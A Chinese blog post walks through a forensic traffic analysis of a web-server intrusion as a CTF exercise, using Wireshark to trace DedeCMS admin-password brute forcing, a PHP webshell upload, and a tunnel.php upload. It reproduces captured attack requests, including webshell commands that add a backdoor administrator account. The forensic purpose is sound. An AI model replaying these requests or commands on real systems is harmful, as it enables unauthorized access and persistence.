本文原创作者: 一叶飘零
原创投稿详情:重金悬赏 | 合天原创投稿等你来!
前记
上篇文章介绍了:流量分析-CTF题目实战,本篇文章对真实企业渗透流量进行分析,其中包括最开始的目录爆破,到最后的反向代理文件上传成功
题目要求
黑客拿到一台服务器的权限,之后进行了内网渗透
1.被攻击的服务器的内网地址
2.被攻击的服务器的外网地址
3.攻击者的ip地址
4.爆破出的后台地址
5.爆破出的后台登录用户名和密码
6.webshell的完整路径
7.被攻击服务器的主机名
8.被攻击服务器的网站根目录
9.黑客获得的权限
数据分析
题目给了大约6个G的数据文件
直接盲目追踪tcp流显然是非常愚钝的方式。
我们的首要目标应该是筛选出攻击者ip和受害者ip
从而实现有效的定点溯源
而日志文件这个时候就成了很好的切入点
日志文件打开切入点
我们选择日志文件查看
排除内网地址,我们可以看到ip:202.99.27.194
疯狂对网站发起请求
于是基本可以确定此ip为攻击者
于是我们去wireshark中过滤出相应的攻击流
目标ip发掘
打开第一个数据流,我们尝试命令
ip.src == 202.99.27.194 && http
可以发现大量流量如下图
不难发现受害者内网ip为:172.16.60.199
同时
看到黑客大量访问网页目录
且asp,jsp什么都在访问,不难看出黑客在进行目录fuzz
然后我们调用wireshark的http负载分配功能
不难得出,受害者外网ip为:118.194.196.232
至此我们已经完成了题目的前3题:
1.被攻击的服务器的内网地址
2.被攻击的服务器的外网地址
3.攻击者的ip地址
答案
172.16.60.199
118.194.196.232
202.99.27.194
后台密码爆破探查
然后题目要求我们找出后台地址
故此我们使用过滤条件
ip.src == 202.99.27.194 && http
不难发现在第二个数据文件中,有如下结果
黑客不断对
/simplexue/login.php
进行post数据
我们查看post内容,随便选取一个http请求头查看
POST /simplexue/login.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/login.php
Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=qwerty
不难看出黑客在尝试密码爆破
userid=admin&pwd=qwerty
故此猜测出,该地址为受害者网站后台
然后我们继续追踪,查看黑客是否爆破登录成功
过滤指令如下
ip.src == 202.99.27.194 && http.request.method=="POST"
然后我们将结果按照爆破时间排序
发现最后一次post结果为
gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=admin123&sm1=
即
userid=admin&pwd=admin123
并且发现发现响应包
Set-Cookie: DedeUserID=1; expires=Wed, 10-Aug-2016 02:36:28 GMT; path=/
其中
DedeUserID=1
故此判断应该登录成功
并且看到后面的标题
DedeCMS........
还能发现受害者网站使用了DedeCMS
getshell
黑客找到了后台,并成功登录,最后上传了webshell
我们使用如下指令
ip.src == 202.99.27.194 && http.request.method=="POST"
不难发现
我们查看
/simplexue/file_manage_control.php
可以发现黑客上传的http请求头
POST /simplexue/file_manage_control.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------76031573231889
Content-Length: 591
-----------------------------76031573231889
Content-Disposition: form-data; name="activepath"
/uploads
-----------------------------76031573231889
Content-Disposition: form-data; name="fmdo"
upload
-----------------------------76031573231889
Content-Disposition: form-data; name="upfile1"; filename="jian.php"
Content-Type: application/octet-stream
-----------------------------76031573231889
Content-Disposition: form-data; name="B1"
........
-----------------------------76031573231889--
黑客上传了一个名为
jian.php
一句话木马文件
其中代码为
php
到此我们又完成了2道题目
4.爆破出的后台地址
5.爆破出的后台登录用户名和密码
答案
/simplexue/login.php
userid=admin&pwd=admin123
我们接着查看下一题
>6.webshell的完整路径
我们查看黑客的第一条指令的http头
POST /uploads/jian.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
g=phpinfo();
不难发现黑客执行了phpinfo()命令
返回中可以看到
Notice: Use of undefined constant g - assumed 'g' in C:\phpStudy\WWW\dedecms\uploads\jian.php on line 1
即可发现webshell的绝对路径
C:\phpStudy\WWW\dedecms\uploads\jian.php
然后我们依次查看黑客执行的命令
Form item: "g" = "system("whoami");"
system("net user test test /ad");
system("net localgroup administrators test /ad");
system("net user test");
system("netstat -ano");
不难发现黑客添加了管理员用户,
账号为:test
密码为:test
为了更加详细的了解目标网站的存在问题
我们导出phpinfo文件
保存为1.html
即可发现
Windows NT SIMPLE-W7LOIJIF 5.2 build 3790 (Windows Server 2003 Enterprise Edition Service Pack 1) i586
可以发现主机名为
SIMPLE-W7LOIJIF
至此9道题目全部完结
整合所有答案
1.被攻击的服务器的内网地址
2.被攻击的服务器的外网地址
3.攻击者的ip地址
4.爆破出的后台地址
5.爆破出的后台登录用户名和密码
6.webshell的完整路径
7.被攻击服务器的主机名
8.被攻击服务器的网站根目录
9.黑客获得的权限
答案
172.16.60.199
118.194.196.232
202.99.27.194
/simplexue/login.php
userid=admin&pwd=admin123
C:\phpStudy\WWW\dedecms\uploads\jian.php
SIMPLE-W7LOIJIF
C:\phpStudy\WWW\dedecms\
administrator
继续探索
但是我们的深入研究之路还未结束,我们继续往后发掘
在第6个数据包里
我们执行过滤指令如下
ip.src == 202.99.27.194 && http
不难看到,黑客再次使用了上传功能
其中我们看见上传内容
POST /simplexue/file_manage_control.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------102512441528556
Content-Length: 6315
-----------------------------102512441528556
Content-Disposition: form-data; name="activepath"
/uploads
-----------------------------102512441528556
Content-Disposition: form-data; name="fmdo"
upload
-----------------------------102512441528556
Content-Disposition: form-data; name="upfile1"; filename="tunnel.php"
Content-Type: application/octet-stream
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
微信扫码登录